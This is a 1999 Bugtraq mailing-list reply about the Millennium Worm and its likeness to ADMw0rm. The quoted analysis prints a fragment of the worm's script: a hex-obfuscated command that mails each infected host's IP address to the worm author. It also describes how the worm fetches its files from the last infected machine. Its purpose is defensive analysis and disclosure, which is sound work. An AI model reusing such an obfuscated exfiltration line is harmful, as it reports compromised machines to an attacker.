[11948] in bugtraq
Re: MW
daemon@ATHENA.MIT.EDU (Max Vision)
Tue Sep 21 13:57:58 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Message-Id: <4.2.0.58.19990920012327.00a59c48@localhost>
Date: Mon, 20 Sep 1999 02:45:59 -0700
Reply-To: Max Vision <vision@WHITEHATS.COM>
From: Max Vision <vision@WHITEHATS.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <E11ON5h-0006DQ-00@devnull.xpert.com>
Hello,
I posted two short write-ups on recent Internet worms I've seen in the wild
(ADMw0rm and Millennium Worm). http://whitehats.com/worms/. From these
previous posts it looks like someone has launched a variation of the
Millennium Worm.
Max Vision
At 05:23 PM 9/7/1999 +0200, Adam Morrison wrote:
> > On Wed, 1 Sep 1999, Christian Koderer wrote:
> > > ./IP | mail `printf
> > > "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
> > > logout
> > > _EOF_
> >
> >
> > In case no one bothered figuring this one out, this translates to
> > 'beurp@hotmail.com'
> >
> > Apparently './IP' is a program it runs to figure out which IP it should
> > get the worm files from. Did you find a similarly named file?
>
>It's a worm; it gets the worm files from the last infected machine.
>`IP' returns the address of the machine that the copy of the worm
>is running on, and is used in the `cmd' grappling hook which
>apparently gets executed on compromised remote hosts. Each time the
>worm infects a machine, it mails the IP address of that machine to
><beurp@hotmail.com>.
>
>Now, not to make any unfounded allegations, but this worm looks
>remarkably like ADMw0rm. I wonder why it restarts named when first
>infecting a host, when it appears to also utilize several other
>vulnerabilites in order to get in. Ho, hum.
